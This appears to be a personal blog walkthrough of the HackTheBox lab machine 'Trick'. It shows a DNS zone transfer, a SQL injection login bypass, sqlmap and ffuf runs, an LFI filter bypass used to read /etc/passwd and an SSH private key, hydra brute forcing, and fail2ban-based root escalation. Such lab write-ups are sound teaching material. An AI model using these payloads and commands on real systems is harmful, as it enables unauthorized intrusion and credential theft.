Oct 29, 2022
Trick — Hackthebox Walkthrough
User
Nmap reveals 2 open ports.
nmap -sC -sV -A -T5 10.10.11.166
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:3
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
| 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain syn-ack
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernelVisiting port 80, we see a static website. Even though I didn’t see a domain name, I added trick.htb to /etc/hosts file.
Since we have port 53 which is DNS open, I started digging in to that. With a little effort I was able to do a zone transfer which gave me 2 different subdomains.
dig @trick.htb axfr trick.htb +answer
I added both of them to the host config and visited the preprod-payroll.trick.htb vhost.
I was presented with a login page. I was able to bypass authentication and login as Administrator with a simple SQL injection payload.
USER: admin' or 1=1 -- -
PASS: kavigihan
Since I had SQL injection there, I though of passing the login request to sqlmap So I copied the req to login.req and ran sqlmap against it.
sqlmap -r login.req — risk=3 — level=3 — threads=10
And it found a time-based SQL injection.
With this, I tried to enumerate the databases. But was taking way too long to dump the content of the databases. Therefore, I took a step back and started to do some vhost fuzzing.
One of the vhosts being preprod-payroll.trick.htb , I felt maybe there could be other vhosts that stats with preprod . Because even in some real life scenarios, we do see such vhosts. I.e dev-api.host.local , dev-db.host.local With this in mind I used ffuf to fuzz for vhosts.
ffuf -u http://$IP/ -H 'Host: preprod-FUZZ.trick.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 1697
And I found another vhost called preprod-marketing.trick.htb But I do have to mention this was not the intended way of finding this. The intended way is to read the nginx config with the SQLi we got. (using --file-read option in sqlmap)
Anyways, moving forward, I added this to the hosts config and visited the site.
Looking at the other pages, I saw ?page= was used to include the other files.
This was a possible vector for LFI, so I tired the typical LFI payload with was ../../../etc/passwd but it didn’t work. PHP filters didn’t work either. So I had to try a different bypass techniques. What worked for me was to use ....//....//....//etc/passwd
So what must have happened was, the index.php must have removed all ../ from the file we specify. That is why our first payload didn’t work. But in our, second payload we had ....// So when ../ is removed from it, the payload becomes ../ ( ....// -> ../ )
So with this LFI, I was included the /etc/passwd file and found a user called michael
curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd --path-as-is
Then I was able to get his ssh private key and login as him.
curl 'http://preprod-marketing.trick.htb/index.php?page=....//....//....//home/michael/.ssh/id_rsa' --path-as-is
chmod 600 id_rsa
ssh michael@10.10.11.166 -i id_rsa
Root
As michael, I ran sudo -l and saw I was able to execute fail2ban restart as root without a password.
So with some googling I was able to find a way to exploit this.
Above article goes over how this works. For this to work, I had to make sure that I had write access over /etc/fail2ban/action.d directory. When I took a look at that, I saw its writable by users in security group which michael user is a member of.
So I knew I this exploit was possible. What happens in this attack is that, we are editing a config file that fail2ban uses to ban uses from access different service for example, ssh. We are changing the command to execute when such an scenario happens to be what we want. Then once such a situation occurs, that command gets executed as root.
Following the walkthrough, I first copied the /etc/fail2ban/action.d/iptables-multiport.conf to /tmp and edited it as follows.
cp /etc/fail2ban/action.d/iptables-multiport.conf /tmp
Then I moved the file back to the initial place where it was
mv /tmpiptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
After I started brute forcing ssh with a username list and a password list to get banned due to high number of failed authentication attempts.
hydra -L userlist -P passlist ssh://10.10.11.166
Meanwhile its running, I restarted the fail2ban service as root.
sudo -u root /etc/init.d/fail2ban restart
After about 5 seconds I saw the SUID bit (+S) was set to /bin/bash
Then I used bash -p to drop in to a root shell.
Rooted!
Contact me though social media:
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
